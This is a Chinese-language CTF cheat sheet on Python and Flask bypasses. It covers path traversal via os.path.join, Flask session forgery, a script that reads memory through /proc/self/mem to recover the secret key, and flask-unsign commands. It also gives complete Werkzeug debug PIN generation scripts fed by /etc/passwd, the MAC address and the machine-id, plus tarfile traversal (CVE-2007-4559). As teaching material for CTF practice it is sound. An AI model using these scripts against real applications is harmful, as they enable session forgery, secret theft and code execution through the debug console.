python绕过

绕过

常见绕过

os.path.join()

如果一个参数是以/符号开头的,就将这个参数作为开头继续向后拼接。

os.path.join('uploads/', '/flag') => '/flag'

render_template()

模板渲染,缓存机制:首先会检查是否有缓存,如果缓存可用就使用缓存,缓存不可用就加载模板。

Cache_size 默认是 400,使用 LRUCache,默认将最常用的页面缓存起来,便于之后的使用,每次访问页面都会将这个页面放到cache的最前方,同时,处于cache后方的页面,由于长期得不到访问,在超过cache规定的最大限制之后,将会被移除出缓存中。

SSTI

SSTI

session伪造

在Flask中,session是保存在Cookie中,也就是本地,所以可以直接读取其内容,也就产生了Flask伪造session的漏洞。

secret key

python存储对象的位置在堆上。

app是实例化的Flask对象,而secret key在 app.config['SECRET_KEY'],可以通过读取 /proc/self/mem 来读取secret key。

读取堆栈分布

由于 /proc/self/mem 内容较多而且存在不可读写部分,直接读取会导致程序崩溃,所以先读取 /proc/self/maps 获取堆栈分布。

1
2
3
4
5
6
7
8
map_list = requests.get(url + f"info?file={bypass}/proc/self/maps")
map_list = map_list.text.split("\\n")
for i in map_list:
map_addr = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
if map_addr:
start = int(map_addr.group(1), 16)
end = int(map_addr.group(2), 16)
print("Found rw addr:", start, "-", end)
读取对应位置内存数据

然后读取 /proc/self/mem,读取对应位置的内存数据,再使用正则表达式查找内容。

1
2
3
4
5
res = requests.get(f"{url}/info?file={bypass}/proc/self/mem&start={start}&end={end}")
if "*abcdefgh" in res.text:
secret_key = re.findall("[a-z0-9]{32}\*abcdefgh", res.text)
if secret_key:
print("Secret Key:", secret_key[0])

工具

flask-unsign

加密:

flask-unsign --sign --cookie "<Session CookieValue>" --secret '<Secretkey>'

解密:

flask-unsign --decode --cookie '<SessionCookieStructure>'

爆破key:

flask-unsign --unsign --cookie '<SessionCookieStructure>'

flask-session-cookie-manager

加密:

flask_session_cookie_manager{2,3}.py encode [-h] -s <SecretKey> -t <SessionCookieStructure>

解密:

flask_session_cookie_manager.py decode [-h] [-s <Secretkey>] -c <Session CookieValue>

解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)

decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True

try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')

if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')

return session_json_serializer.loads(payload)

if __name__ == '__main__':
print(decryption(sys.argv[1].encode()))

Flask debug PIN

PIN码是Flask在开启debug模式下,进行代码调试模式的进入密码,需要正确的PIN码才能进入调试模式。

计算逻辑位于 python3.x/site-packages/werkzeug/debug/__init__.py#get_pin_and_cookie_name,版本不同的区别在于3.6与3.8的md5加密和sha1加密不同。

PIN生成要素:

  1. username

    用户名。通过 getpass.getuser() 读取,通过文件读取 /etc/passwd

  2. modname

    模块名。通过 getattr(mod,"file",None) 读取,默认值为 flask.app

  3. appname

    应用名。通过 getattr(app,"name",type(app).name) 读取,默认值为 Flask

  4. moddir

    Flask库下 app.py 的绝对路径。通过 getattr(mod,"file",None) 读取,实际应用中通过报错读取。

  5. uuidnode

    当前网络的mac地址的十进制数。通过 uuid.getnode() 读取,通过文件 /sys/class/net/eth0/address 得到16进制结果,转化为10进制进行计算。

  6. machine_id

    docker机器id。每一个机器都会有自已唯一的id,linux的id一般存放在 /etc/machine-id/proc/sys/kernel/random/boot_id,docker靶机则读取 /proc/self/cgroup,其中第一行的 /docker/ 字符串后面的内容作为机器的id,在docker环境下读取后两个,非docker环境三个都需要读取。

PIN生成脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# <3.8 MD5
import hashlib
from itertools import chain
probably_public_bits = [
'flaskweb'# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
'25214234362297',# str(uuid.getnode()), /sys/class/net/ens33/address
'0402a7ff83cc48b41b227763d03b386cb5040585c82f3b99aa3ad120ae69ebaa'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# >=3.8 sha1
import hashlib
from itertools import chain
probably_public_bits = [
'root'# /etc/passwd
'flask.app',# 默认值
'Flask',# 默认值
'/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
'2485377581187',# /sys/class/net/eth0/address 16进制转10进制
#machine_id由三个合并(docker就后两个):1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
'653dc458-4634-42b1-9a7a-b22a082e1fce55d22089f5fa429839d25dcea4675fb930c111da3bb774a6ab7349428589aefd'# /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)

参考:

ctfshow - web 801

GYCTF 2020 - FlaskApp

*CTF - oh-my-notepro

其他

tarfile模块

CVE-2007-4559

该漏洞影响到Python的tarfile模块,可造成系统文件的任意读取和写入。CVE-2007-4559的基本原理与CVE-2001-1267类似,当使用tar打包一个包含 ../../../../../etc/passwd,并用管理员权限解包时,/etc/passwd 文件会被覆盖,同理使用文件链接也可以产生同样的效果。